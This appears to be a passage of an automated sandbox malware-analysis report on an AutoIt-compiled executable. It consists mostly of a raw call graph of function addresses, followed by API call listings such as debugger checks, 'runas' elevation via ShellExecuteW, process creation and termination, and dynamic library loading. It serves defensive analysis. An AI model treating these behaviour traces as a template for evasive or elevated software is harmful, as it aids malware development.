99175 1341d6 98654->99175 98657 12502b 59 API calls 98655->98657 98660 12d6f3 98657->98660 98661 1650ca 98660->98661 98662 12d70d 98660->98662 98663 140fe6 Mailbox 59 API calls 98661->98663 98664 131207 59 API calls 98662->98664 98665 1650d0 98663->98665 98666 12d715 98664->98666 98667 1650e4 98665->98667 99180 133ea1 98665->99180 99204 133b7b 65 API calls Mailbox 98666->99204 98673 1650e8 _memmove 98667->98673 99183 187c7f 98667->99183 98669 12d724 98669->98673 99205 124f3c 59 API calls Mailbox 98669->99205 98674 12d738 Mailbox 98675 12d772 98674->98675 99206 1342cf 98674->99206 98675->98514 98680 18d6dd 98679->98680 98681 18d6e8 98679->98681 98682 12502b 59 API calls 98680->98682 98684 131207 59 API calls 98681->98684 98722 18d7c2 Mailbox 98681->98722 98682->98681 98683 140fe6 Mailbox 59 API calls 98685 18d80b 98683->98685 98686 18d70c 98684->98686 98691 18d817 98685->98691 99267 133df7 60 API calls Mailbox 98685->99267 98687 131207 59 API calls 98686->98687 98690 18d715 98687->98690 98689 124d37 84 API calls 98692 18d82f 98689->98692 98693 124d37 84 API calls 98690->98693 98691->98689 98694 133e47 67 API calls 98692->98694 98695 18d721 98693->98695 98696 18d83e 98694->98696 98697 140119 59 API calls 98695->98697 98698 18d842 GetLastError 98696->98698 98699 18d876 98696->98699 98700 18d736 98697->98700 98701 18d85b 98698->98701 98703 18d8d8 98699->98703 98704 18d8a1 98699->98704 98702 1317e0 59 API calls 98700->98702 98721 18d7cb Mailbox 98701->98721 99268 133f0b CloseHandle 98701->99268 98705 18d769 98702->98705 98707 140fe6 Mailbox 59 API calls 98703->98707 98706 140fe6 Mailbox 59 API calls 98704->98706 98711 18412a 3 API calls 98705->98711 98723 18d793 Mailbox 98705->98723 98708 18d8a6 98706->98708 98712 18d8dd 98707->98712 98713 18d8b7 98708->98713 98716 131207 59 API calls 98708->98716 98710 12502b 59 API calls 98710->98722 98714 18d779 98711->98714 98715 131207 59 API calls 98712->98715 98712->98721 99269 18fc0d 59 API calls 2 library calls 98713->99269 
98718 131a36 59 API calls 98714->98718 98714->98723 98715->98721 98716->98713 98719 18d78a 98718->98719 99255 183f1d 98719->99255 98721->98514 98722->98683 98722->98721 98723->98710 98725 19c39a 98724->98725 98726 19c380 98724->98726 99270 19a8fd 98725->99270 99297 18a48d 89 API calls 4 library calls 98726->99297 98730 1253b0 298 API calls 98731 19c406 98730->98731 98732 19c392 Mailbox 98731->98732 98733 19c498 98731->98733 98734 19c447 98731->98734 98732->98500 98735 19c4ee 98733->98735 98737 19c49e 98733->98737 98742 18789a 59 API calls 98734->98742 98735->98732 98736 124d37 84 API calls 98735->98736 98738 19c500 98736->98738 99298 187ed5 59 API calls 98737->99298 98740 131aa4 59 API calls 98738->98740 98743 19c524 CharUpperBuffW 98740->98743 98741 19c4c1 99299 1335b9 59 API calls Mailbox 98741->99299 98745 19c477 98742->98745 98748 19c53e 98743->98748 98747 176ebc 298 API calls 98745->98747 98746 19c4c9 Mailbox 99300 12b020 98746->99300 98747->98732 98749 19c591 98748->98749 98750 19c545 98748->98750 98751 124d37 84 API calls 98749->98751 99277 18789a 98750->99277 98753 19c599 98751->98753 99342 125376 60 API calls 98753->99342 98758 19c5a3 98758->98732 98759 124d37 84 API calls 98758->98759 98760 19c5be 98759->98760 99343 1335b9 59 API calls Mailbox 98760->99343 98762 19c5ce 98763 12b020 298 API calls 98762->98763 98763->98732 98764->98541 98765->98541 98766->98514 98767->98500 98768->98509 98769->98503 98770->98512 98771->98517 98773 131ca7 98772->98773 98774 131caf 98772->98774 99882 131bcc 59 API calls 2 library calls 98773->99882 98774->98500 98776->98500 98778 131a45 __wsetenvp _memmove 98777->98778 98779 140fe6 Mailbox 59 API calls 98778->98779 98780 131a83 98779->98780 98780->98500 98781->98500 98782->98514 98783->98525 98784->98540 98785->98544 98786->98494 98787->98540 98788->98494 98789->98494 98790->98540 98791->98540 98792->98575 98793->98575 98794->98567 98795->98577 98796->98580 98797->98577 98798->98577 98800 140fe6 Mailbox 59 API calls 
98799->98800 98801 1340e0 98800->98801 98802 131c7e 59 API calls 98801->98802 98803 1340ed 98802->98803 98804 124d37 98803->98804 98805 124d51 98804->98805 98806 124d4b 98804->98806 98807 15db28 __i64tow 98805->98807 98808 124d99 98805->98808 98810 124d57 __itow 98805->98810 98814 15da2f 98805->98814 98822 13402a WideCharToMultiByte 98806->98822 98837 1438c8 83 API calls 3 library calls 98808->98837 98812 140fe6 Mailbox 59 API calls 98810->98812 98813 124d71 98812->98813 98813->98806 98816 131a36 59 API calls 98813->98816 98815 140fe6 Mailbox 59 API calls 98814->98815 98817 15daa7 Mailbox _wcscpy 98814->98817 98818 15da74 98815->98818 98816->98806 98838 1438c8 83 API calls 3 library calls 98817->98838 98819 140fe6 Mailbox 59 API calls 98818->98819 98820 15da9a 98819->98820 98820->98817 98821 131a36 59 API calls 98820->98821 98821->98817 98823 134085 98822->98823 98824 13404e 98822->98824 98840 133f20 59 API calls Mailbox 98823->98840 98826 140fe6 Mailbox 59 API calls 98824->98826 98827 134055 WideCharToMultiByte 98826->98827 98839 133f79 59 API calls 2 library calls 98827->98839 98829 134077 98829->98595 98831 125041 98830->98831 98832 12503c 98830->98832 98831->98587 98832->98831 98841 1437ba 59 API calls 98832->98841 98835 140fe6 Mailbox 59 API calls 98834->98835 98836 134351 98835->98836 98836->98602 98836->98603 98837->98810 98838->98807 98839->98829 98840->98829 98841->98831 98852 184ce2 98842->98852 98844 184244 CloseHandle 98844->98610 98845 184195 Process32NextW 98845->98844 98851 18418e Mailbox 98845->98851 98846 131207 59 API calls 98846->98851 98847 131a36 59 API calls 98847->98851 98851->98844 98851->98845 98851->98846 98851->98847 98858 140119 98851->98858 98909 1317e0 98851->98909 98918 13151f 98851->98918 98853 184d09 98852->98853 98857 184cf0 98852->98857 98922 1437c3 59 API calls __wcstoi64 98853->98922 98856 184d0f 98856->98851 98857->98853 98857->98856 98921 14385c GetStringTypeW _iswctype 98857->98921 98859 131207 59 API calls 98858->98859 98860 
14012f 98859->98860 98861 131207 59 API calls 98860->98861 98862 140137 98861->98862 98863 131207 59 API calls 98862->98863 98864 14013f 98863->98864 98865 131207 59 API calls 98864->98865 98866 140147 98865->98866 98867 17627d 98866->98867 98868 14017b 98866->98868 98869 131c9c 59 API calls 98867->98869 98870 131462 59 API calls 98868->98870 98871 176286 98869->98871 98872 140189 98870->98872 98939 1319e1 98871->98939 98874 131981 59 API calls 98872->98874 98875 140193 98874->98875 98876 1401be 98875->98876 98877 131462 59 API calls 98875->98877 98878 1401fe 98876->98878 98880 1401dd 98876->98880 98891 1762a6 98876->98891 98881 1401b4 98877->98881 98923 131462 98878->98923 98936 131609 98880->98936 98885 131981 59 API calls 98881->98885 98883 14020f 98887 140221 98883->98887 98889 131c9c 59 API calls 98883->98889 98884 176376 98888 131821 59 API calls 98884->98888 98885->98876 98890 140231 98887->98890 98894 131c9c 59 API calls 98887->98894 98904 176333 98888->98904 98889->98887 98892 140238 98890->98892 98896 131c9c 59 API calls 98890->98896 98891->98884 98895 17635f 98891->98895 98902 1762dd 98891->98902 98897 131c9c 59 API calls 98892->98897 98906 14023f Mailbox 98892->98906 98893 131462 59 API calls 98893->98878 98894->98890 98895->98884 98899 17634a 98895->98899 98896->98892 98897->98906 98898 17633b 98900 131821 59 API calls 98898->98900 98901 131821 59 API calls 98899->98901 98900->98904 98901->98904 98902->98898 98907 176326 98902->98907 98903 131609 59 API calls 98903->98904 98904->98878 98904->98903 98943 13153b 59 API calls 2 library calls 98904->98943 98906->98851 98908 131821 59 API calls 98907->98908 98908->98904 98910 1317f2 98909->98910 98911 16f401 98909->98911 98945 131680 98910->98945 98951 1787f9 59 API calls _memmove 98911->98951 98914 16f40b 98916 131c9c 59 API calls 98914->98916 98915 1317fe 98915->98851 98917 16f413 Mailbox 98916->98917 98952 1314db 98918->98952 98921->98857 98922->98856 98924 131471 98923->98924 98925 1314ce 98923->98925 
98924->98925 98926 13147c 98924->98926 98927 131981 59 API calls 98925->98927 98928 131497 98926->98928 98929 16f1de 98926->98929 98933 13149f _memmove 98927->98933 98944 131b7c 59 API calls Mailbox 98928->98944 98931 131c7e 59 API calls 98929->98931 98932 16f1e8 98931->98932 98934 140fe6 Mailbox 59 API calls 98932->98934 98933->98883 98935 16f208 98934->98935 98937 131aa4 59 API calls 98936->98937 98938 131614 98937->98938 98938->98878 98938->98893 98940 1319fb 98939->98940 98941 1319ee 98939->98941 98942 140fe6 Mailbox 59 API calls 98940->98942 98941->98876 98942->98941 98943->98904 98944->98933 98946 131692 98945->98946 98950 1316ba _memmove 98945->98950 98947 140fe6 Mailbox 59 API calls 98946->98947 98946->98950 98948 13176f _memmove 98947->98948 98949 140fe6 Mailbox 59 API calls 98948->98949 98949->98948 98950->98915 98951->98914 98953 1314e9 CompareStringW 98952->98953 98958 16f210 98952->98958 98956 13150c 98953->98956 98955 16f25f 98956->98851 98957 144eb8 60 API calls 98957->98958 98958->98955 98958->98957 98960 18413f 98959->98960 98961 184965 FindFirstFileW 98959->98961 98960->98514 98961->98960 98962 18497a FindClose 98961->98962 98962->98960 98964 140fe6 Mailbox 59 API calls 98963->98964 98965 125285 98964->98965 98966 125294 98965->98966 98967 131a36 59 API calls 98965->98967 98966->98621 98967->98966 98969 1431ae 98968->98969 98970 143139 98968->98970 99002 1431c0 60 API calls 3 library calls 98969->99002 98974 14315e 98970->98974 99000 148d58 58 API calls __getptd_noexit 98970->99000 98973 1431bb 98973->98631 98974->98631 98975 143145 99001 148fe6 9 API calls _fseek 98975->99001 98977 143150 98977->98631 98979 1359fe _memset 98978->98979 99003 135800 98979->99003 98981 135a83 98984 135ab9 Shell_NotifyIconW 98981->98984 98985 135a9d Shell_NotifyIconW 98981->98985 98986 135aab 98984->98986 98985->98986 99007 1356f8 98986->99007 98988 135ab2 98988->98631 98990 135b25 98989->98990 98991 135ad5 _memset 98989->98991 98990->98631 98992 135af4 
Shell_NotifyIconW 98991->98992 98992->98990 98994 140fe6 Mailbox 59 API calls 98993->98994 98995 131652 98994->98995 98996 140fe6 Mailbox 59 API calls 98995->98996 98997 131660 98996->98997 98997->98631 98998->98631 98999->98631 99000->98975 99001->98977 99002->98973 99004 135810 99003->99004 99005 13581c 99003->99005 99004->98981 99037 1834dd 62 API calls _W_store_winword 99004->99037 99005->99004 99006 135821 DestroyIcon 99005->99006 99006->99004 99008 135715 99007->99008 99009 1357fa Mailbox 99007->99009 99010 13162d 59 API calls 99008->99010 99009->98988 99011 135723 99010->99011 99012 135730 99011->99012 99013 170c4c LoadStringW 99011->99013 99014 131821 59 API calls 99012->99014 99016 170c66 99013->99016 99015 135745 99014->99015 99017 135752 99015->99017 99023 170c74 99015->99023 99018 131c9c 59 API calls 99016->99018 99017->99016 99019 135760 99017->99019 99025 135778 _memset _wcscpy 99018->99025 99038 131900 99019->99038 99022 1317e0 59 API calls 99022->99025 99024 170cb7 Mailbox 99023->99024 99023->99025 99026 131207 59 API calls 99023->99026 99046 1438c8 83 API calls 3 library calls 99024->99046 99027 1357e0 Shell_NotifyIconW 99025->99027 99028 170c9e 99026->99028 99027->99009 99045 180252 60 API calls Mailbox 99028->99045 99031 170cd6 99033 131900 59 API calls 99031->99033 99032 170ca9 99034 1317e0 59 API calls 99032->99034 99035 170ce7 99033->99035 99034->99024 99036 131900 59 API calls 99035->99036 99036->99025 99037->98981 99039 16f534 99038->99039 99040 131914 99038->99040 99042 131c7e 59 API calls 99039->99042 99047 1318a5 99040->99047 99044 16f53f __wsetenvp _memmove 99042->99044 99043 13191f 99043->99022 99045->99032 99046->99031 99048 1318b4 __wsetenvp 99047->99048 99049 131c7e 59 API calls 99048->99049 99050 1318c5 _memmove 99048->99050 99051 16f4f1 _memmove 99049->99051 99050->99043 99053 124d37 84 API calls 99052->99053 99054 19d203 99053->99054 99059 19d24a Mailbox 99054->99059 99090 19de8e 99054->99090 99056 19d617 99141 19dfb1 92 API calls 
Mailbox 99056->99141 99059->98638 99060 19d29b Mailbox 99060->99059 99063 124d37 84 API calls 99060->99063 99078 19d4a2 99060->99078 99123 18fc0d 59 API calls 2 library calls 99060->99123 99124 19d6c8 61 API calls 2 library calls 99060->99124 99061 19d626 99062 19d4b0 99061->99062 99064 19d632 99061->99064 99103 19d057 99062->99103 99063->99060 99064->99059 99069 19d4e9 99118 140e38 99069->99118 99072 19d51c 99126 1247be 99072->99126 99073 19d503 99125 18a48d 89 API calls 4 library calls 99073->99125 99077 19d50e GetCurrentProcess TerminateProcess 99077->99072 99078->99056 99078->99062 99082 19d68d 99082->99059 99086 19d6a1 FreeLibrary 99082->99086 99083 19d554 99138 19dd32 107 API calls _free 99083->99138 99086->99059 99088 19d565 99088->99082 99139 124230 59 API calls Mailbox 99088->99139 99140 12523c 59 API calls 99088->99140 99142 19dd32 107 API calls _free 99088->99142 99091 131aa4 59 API calls 99090->99091 99092 19dea9 CharLowerBuffW 99091->99092 99143 17f903 99092->99143 99096 131207 59 API calls 99097 19dee2 99096->99097 99098 131462 59 API calls 99097->99098 99100 19def9 99098->99100 99099 19df41 Mailbox 99099->99060 99101 131981 59 API calls 99100->99101 99102 19df05 Mailbox 99101->99102 99102->99099 99150 19d6c8 61 API calls 2 library calls 99102->99150 99104 19d072 99103->99104 99108 19d0c7 99103->99108 99105 140fe6 Mailbox 59 API calls 99104->99105 99107 19d094 99105->99107 99106 140fe6 Mailbox 59 API calls 99106->99107 99107->99106 99107->99108 99109 19e139 99108->99109 99110 19e362 Mailbox 99109->99110 99114 19e15c _strcat _wcscpy __wsetenvp 99109->99114 99110->99069 99111 12502b 59 API calls 99111->99114 99112 1250d5 59 API calls 99112->99114 99113 125087 59 API calls 99113->99114 99114->99110 99114->99111 99114->99112 99114->99113 99115 14593c 58 API calls __crtCompareStringA_stat 99114->99115 99116 124d37 84 API calls 99114->99116 99151 185e42 61 API calls 2 library calls 99114->99151 99115->99114 99116->99114 99119 140e4d 99118->99119 99120 
140ee5 CreateProcessW 99119->99120 99121 140eb3 99119->99121 99122 140ed3 CloseHandle 99119->99122 99120->99121 99121->99072 99121->99073 99122->99121 99123->99060 99124->99060 99125->99077 99127 1247c6 99126->99127 99128 140fe6 Mailbox 59 API calls 99127->99128 99129 1247d4 99128->99129 99130 1247e0 99129->99130 99152 1246ec 59 API calls Mailbox 99129->99152 99132 124540 99130->99132 99153 124650 99132->99153 99134 12454f 99135 140fe6 Mailbox 59 API calls 99134->99135 99136 1245eb 99134->99136 99135->99136 99136->99088 99137 124230 59 API calls Mailbox 99136->99137 99137->99083 99138->99088 99139->99088 99140->99088 99141->99061 99142->99088 99145 17f92e __wsetenvp 99143->99145 99144 17f96d 99144->99096 99144->99102 99145->99144 99148 17f963 99145->99148 99149 17fa14 99145->99149 99146 1314db 61 API calls 99146->99148 99147 1314db 61 API calls 99147->99149 99148->99144 99148->99146 99149->99144 99149->99147 99150->99099 99151->99114 99152->99130 99154 124659 Mailbox 99153->99154 99155 15d6ec 99154->99155 99160 124663 99154->99160 99156 140fe6 Mailbox 59 API calls 99155->99156 99159 15d6f8 99156->99159 99157 12466a 99157->99134 99159->99159 99160->99157 99161 125190 59 API calls Mailbox 99160->99161 99161->99160 99163 124fa8 99162->99163 99164 15dd2b 99162->99164 99168 140fe6 Mailbox 59 API calls 99163->99168 99165 15dd3c 99164->99165 99166 131821 59 API calls 99164->99166 99167 1319e1 59 API calls 99165->99167 99166->99165 99170 15dd46 99167->99170 99169 124fbb 99168->99169 99169->99170 99171 124fc6 99169->99171 99172 124fd4 99170->99172 99173 131207 59 API calls 99170->99173 99171->99172 99174 131a36 59 API calls 99171->99174 99172->98643 99172->98646 99173->99172 99174->99172 99213 13410a 99175->99213 99178 13410a 2 API calls 99179 13420b 99178->99179 99179->98660 99223 134220 99180->99223 99184 187c8a 99183->99184 99185 140fe6 Mailbox 59 API calls 99184->99185 99186 187c91 99185->99186 99187 187c9d 99186->99187 99188 187cbe 99186->99188 99189 140fe6 Mailbox 59 
API calls 99187->99189 99190 140fe6 Mailbox 59 API calls 99188->99190 99191 187ca6 _memset 99189->99191 99190->99191 99191->98673 99192->98647 99194 1342cf CloseHandle 99193->99194 99195 133e53 99194->99195 99230 1342f9 99195->99230 99197 12d6d7 99197->98645 99197->98646 99211 133f0b CloseHandle 99197->99211 99198 133e72 99198->99197 99238 133c61 62 API calls Mailbox 99198->99238 99200 133e84 99239 13389f 99200->99239 99204->98669 99205->98674 99207 12d766 99206->99207 99208 1342e8 99206->99208 99207->98675 99210 133f0b CloseHandle 99207->99210 99208->99207 99209 1342ed CloseHandle 99208->99209 99209->99207 99210->98675 99211->98646 99212->98646 99214 134124 99213->99214 99215 1706cc 99214->99215 99216 1341ab SetFilePointerEx 99214->99216 99220 13417f 99214->99220 99222 1342ae SetFilePointerEx 99215->99222 99221 1342ae SetFilePointerEx 99216->99221 99219 1706e6 99220->99178 99221->99220 99222->99219 99224 134293 99223->99224 99228 13422e 99223->99228 99229 1342ae SetFilePointerEx 99224->99229 99225 133eb2 99225->98667 99227 134266 ReadFile 99227->99225 99227->99228 99228->99225 99228->99227 99229->99228 99231 134312 CreateFileW 99230->99231 99232 1706fc 99230->99232 99233 134334 99231->99233 99232->99233 99234 170702 CreateFileW 99232->99234 99233->99198 99234->99233 99235 170728 99234->99235 99236 13410a 2 API calls 99235->99236 99237 170733 99236->99237 99237->99233 99238->99200 99240 1338b5 99239->99240 99241 1338a8 99239->99241 99240->99197 99243 18394d 99240->99243 99242 13410a 2 API calls 99241->99242 99242->99240 99246 18384c 99243->99246 99245 183959 WriteFile 99245->99197 99247 18385e 99246->99247 99248 183853 99246->99248 99247->99245 99253 1342ae SetFilePointerEx 99248->99253 99250 1838b8 SetFilePointerEx 99254 1342ae SetFilePointerEx 99250->99254 99252 1838d7 99252->99245 99253->99250 99254->99252 99256 13133d 59 API calls 99255->99256 99257 183f52 GetFileAttributesW 99256->99257 99258 183f66 GetLastError 99257->99258 99260 183f7f Mailbox 99257->99260 
99259 183f73 CreateDirectoryW 99258->99259 99261 183f81 99258->99261 99259->99260 99259->99261 99260->98723 99261->99260 99262 131981 59 API calls 99261->99262 99263 183fc3 99262->99263 99264 183f1d 59 API calls 99263->99264 99265 183fcc 99264->99265 99265->99260 99266 183fd0 CreateDirectoryW 99265->99266 99266->99260 99267->98691 99268->98721 99269->98721 99271 19a918 99270->99271 99272 19a970 99270->99272 99273 140fe6 Mailbox 59 API calls 99271->99273 99272->98730 99276 19a93a 99273->99276 99274 140fe6 Mailbox 59 API calls 99274->99276 99276->99272 99276->99274 99344 17715b 59 API calls Mailbox 99276->99344 99278 1878ac 99277->99278 99280 1878e3 99277->99280 99279 140fe6 Mailbox 59 API calls 99278->99279 99278->99280 99279->99280 99281 176ebc 99280->99281 99282 176f06 99281->99282 99290 176f1c Mailbox 99281->99290 99283 131a36 59 API calls 99282->99283 99283->99290 99284 176f47 99285 19c355 299 API calls 99284->99285 99293 176f53 99285->99293 99286 176f5a 99345 12a820 99286->99345 99289 177002 99289->98732 99290->99284 99290->99286 99291 176f91 99292 176fdc 99291->99292 99291->99293 99295 176fc1 99291->99295 99292->99293 99367 18a48d 89 API calls 4 library calls 99292->99367 99368 176cf1 59 API calls Mailbox 99293->99368 99362 17706d 99295->99362 99297->98732 99298->98741 99299->98746 99384 133740 99300->99384 99302 12bb86 99479 18a48d 89 API calls 4 library calls 99302->99479 99304 1630b6 99480 18a48d 89 API calls 4 library calls 99304->99480 99306 12b07f 99306->99302 99306->99304 99307 1630d4 99306->99307 99338 12b132 Mailbox _memmove 99306->99338 99481 18a48d 89 API calls 4 library calls 99307->99481 99309 16355e 99341 12b4dd 99309->99341 99496 18a48d 89 API calls 4 library calls 99309->99496 99310 17730a 59 API calls 99310->99338 99311 16318a 99311->99341 99483 18a48d 89 API calls 4 library calls 99311->99483 99313 140fe6 59 API calls Mailbox 99313->99338 99317 163106 99317->99311 99482 12a9de 299 API calls 99317->99482 99320 1253b0 299 API calls 99320->99338 
100957 134a8c 100849->100957 100852->100845 100854->100648 100856 170945 100855->100856 100857 134ac4 100855->100857 101069 145802 100857->101069 100860 1896c4 101194 18951a 100860->101194 100869 134b44 100868->100869 100870 134b80 LoadLibraryA 100868->100870 100869->100822 100869->100825 100870->100869 100871 134b91 GetProcAddress 100870->100871 100871->100869 100873 14549c _fseek 100872->100873 100874 1454af 100873->100874 100877 1454e0 100873->100877 100921 148d58 58 API calls __getptd_noexit 100874->100921 100876 1454b4 100922 148fe6 9 API calls _fseek 100876->100922 100891 150718 100877->100891 100880 1454e5 100881 1454ee 100880->100881 100882 1454fb 100880->100882 100923 148d58 58 API calls __getptd_noexit 100881->100923 100884 145525 100882->100884 100885 145505 100882->100885 100906 150837 100884->100906 100924 148d58 58 API calls __getptd_noexit 100885->100924 100887 1454bf _fseek @_EH4_CallFilterFunc@8 100887->100828 100892 150724 _fseek 100891->100892 100893 149e3b __lock 58 API calls 100892->100893 100894 150732 100893->100894 100895 1507ad 100894->100895 100901 149ec3 __mtinitlocknum 58 API calls 100894->100901 100904 1507a6 100894->100904 100929 146e7d 59 API calls __lock 100894->100929 100930 146ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100894->100930 100931 148a4d 58 API calls 2 library calls 100895->100931 100898 1507b4 100898->100904 100932 14a05b InitializeCriticalSectionAndSpinCount 100898->100932 100899 150823 _fseek 100899->100880 100901->100894 100903 1507da EnterCriticalSection 100903->100904 100926 15082e 100904->100926 100915 150857 __wopenfile 100906->100915 100907 150871 100937 148d58 58 API calls __getptd_noexit 100907->100937 100909 150a2c 100909->100907 100913 150a8f 100909->100913 100910 150876 100938 148fe6 9 API calls _fseek 100910->100938 100912 145530 100925 145552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100912->100925 100934 1587d1 100913->100934 100915->100907 100915->100909 100915->100915 100939 1439fb 
60 API calls 2 library calls 100915->100939 100917 150a25 100917->100909 100940 1439fb 60 API calls 2 library calls 100917->100940 100919 150a44 100919->100909 100941 1439fb 60 API calls 2 library calls 100919->100941 100921->100876 100922->100887 100923->100887 100924->100887 100925->100887 100933 149fa5 LeaveCriticalSection 100926->100933 100928 150835 100928->100899 100929->100894 100930->100894 100931->100898 100932->100903 100933->100928 100942 157fb5 100934->100942 100937->100910 100938->100912 100939->100917 100940->100919 100941->100909 100944 157fc1 _fseek 100942->100944 100943 157fd7 100945 148d58 _fseek 58 API calls 100943->100945 100944->100943 100947 15800d 100944->100947 100946 157fdc 100945->100946 100948 15807e __wsopen_nolock 109 API calls 100947->100948 100950 158029 100948->100950 100954 134af7 100953->100954 100955 134bb3 LoadLibraryA 100953->100955 100954->100832 100954->100835 100955->100954 100956 134bc4 GetProcAddress 100955->100956 100956->100954 100962->100844 100963->100845 101072 14581d 101069->101072 101071 134ad5 101071->100860 101073 145829 _fseek 101072->101073 101074 14586c 101073->101074 101075 14583f _memset 101073->101075 101076 145864 _fseek 101073->101076 101077 146e3e __lock_file 59 API calls 101074->101077 101099 148d58 58 API calls __getptd_noexit 101075->101099 101076->101071 101079 145872 101077->101079 101085 14563d 101079->101085 101080 145859 101100 148fe6 9 API calls _fseek 101080->101100 101086 145673 101085->101086 101089 145658 _memset 101085->101089 101101 1458a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 101086->101101 101087 145663 101089->101086 101089->101087 101091 1456b3 101089->101091 101091->101086 101093 1457c4 _memset 101091->101093 101094 144906 __fclose_nolock 58 API calls 101091->101094 101102 15108b 101091->101102 101170 150dd7 101091->101170 101192 150ef8 58 API calls 3 library calls 101091->101192 101094->101091 101099->101080 101100->101076 101101->101076 101192->101091 101197 14542a 
GetSystemTimeAsFileTime 101194->101197 101198 145458 __aulldiv 101197->101198 101375 129a88 101378 1286e0 101375->101378 101379 1286fd 101378->101379 101380 160fad 101379->101380 101381 160ff8 101379->101381 101406 128724 101379->101406 101384 160fb5 101380->101384 101387 160fc2 101380->101387 101380->101406 101413 19aad0 299 API calls __cinit 101381->101413 101382 125278 59 API calls 101382->101406 101411 19b0e4 299 API calls 101384->101411 101385 142f70 __cinit 67 API calls 101385->101406 101402 12898d 101387->101402 101412 19b58c 299 API calls 3 library calls 101387->101412 101388 123f42 68 API calls 101388->101406 101391 123c30 68 API calls 101391->101406 101392 161289 101392->101392 101393 1611af 101416 19ae3b 89 API calls 101393->101416 101396 128a17 101397 1239be 68 API calls 101397->101406 101402->101396 101417 18a48d 89 API calls 4 library calls 101402->101417 101403 1253b0 299 API calls 101403->101406 101404 131c9c 59 API calls 101404->101406 101406->101382 101406->101385 101406->101388 101406->101391 101406->101393 101406->101396 101406->101397 101406->101402 101406->101403 101406->101404 101407 123938 68 API calls 101406->101407 101408 12855e 299 API calls 101406->101408 101409 1284e2 89 API calls 101406->101409 101410 12835f 299 API calls 101406->101410 101414 12523c 59 API calls 101406->101414 101415 1773ab 59 API calls 101406->101415 101407->101406 101408->101406 101409->101406 101410->101406 101411->101387 101412->101402 101413->101406 101414->101406 101415->101406 101416->101402 101417->101392 101418 129a6c 101421 12829c 101418->101421 101420 129a78 101422 1282b4 101421->101422 101429 128308 101421->101429 101423 1253b0 299 API calls 101422->101423 101422->101429 101427 1282eb 101423->101427 101425 160ed8 101425->101425 101426 128331 101426->101420 101427->101426 101430 12523c 59 API calls 101427->101430 101429->101426 101431 18a48d 89 API calls 4 library calls 101429->101431 101430->101429 101431->101425
                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0013526C
                                                      • IsDebuggerPresent.KERNEL32 ref: 0013527E
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 001352E6
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                        • Part of subcall function 0012BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0012BC07
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00135366
                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00170B2E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00170B66
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001D6D10), ref: 00170BE9
                                                      • ShellExecuteW.SHELL32(00000000), ref: 00170BF0
                                                        • Part of subcall function 0013514C: GetSysColorBrush.USER32(0000000F), ref: 00135156
                                                        • Part of subcall function 0013514C: LoadCursorW.USER32(00000000,00007F00), ref: 00135165
                                                        • Part of subcall function 0013514C: LoadIconW.USER32(00000063), ref: 0013517C
                                                        • Part of subcall function 0013514C: LoadIconW.USER32(000000A4), ref: 0013518E
                                                        • Part of subcall function 0013514C: LoadIconW.USER32(000000A2), ref: 001351A0
                                                        • Part of subcall function 0013514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001351C6
                                                        • Part of subcall function 0013514C: RegisterClassExW.USER32(?), ref: 0013521C
                                                        • Part of subcall function 001350DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00135109
                                                        • Part of subcall function 001350DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0013512A
                                                        • Part of subcall function 001350DB: ShowWindow.USER32(00000000), ref: 0013513E
                                                        • Part of subcall function 001350DB: ShowWindow.USER32(00000000), ref: 00135147
                                                        • Part of subcall function 001359D3: _memset.LIBCMT ref: 001359F9
                                                        • Part of subcall function 001359D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00135A9E
                                                      Strings
                                                      • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00170B28
                                                      • runas, xrefs: 00170BE4
                                                      • AutoIt, xrefs: 00170B23
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                      • API String ID: 529118366-2030392706
                                                      • Opcode ID: a13b6abb1585de2af52c11818a2f788d2196e21fb3bc5faef21c5b35b04eb14d
                                                      • Instruction ID: 2c44f43202e06f865b8de687adaa244d1bae6560bd809648154e2b0cf8627bd9
                                                      • Opcode Fuzzy Hash: a13b6abb1585de2af52c11818a2f788d2196e21fb3bc5faef21c5b35b04eb14d
                                                      • Instruction Fuzzy Hash: C5511730908689EEDF02EBF0DC85EEE7B75AF29740F144165F651671A2CB704685C720
                                                      APIs
                                                        • Part of subcall function 00140284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00132A58,?,00008000), ref: 001402A4
                                                        • Part of subcall function 00184FEC: GetFileAttributesW.KERNEL32(?,00183BFE), ref: 00184FED
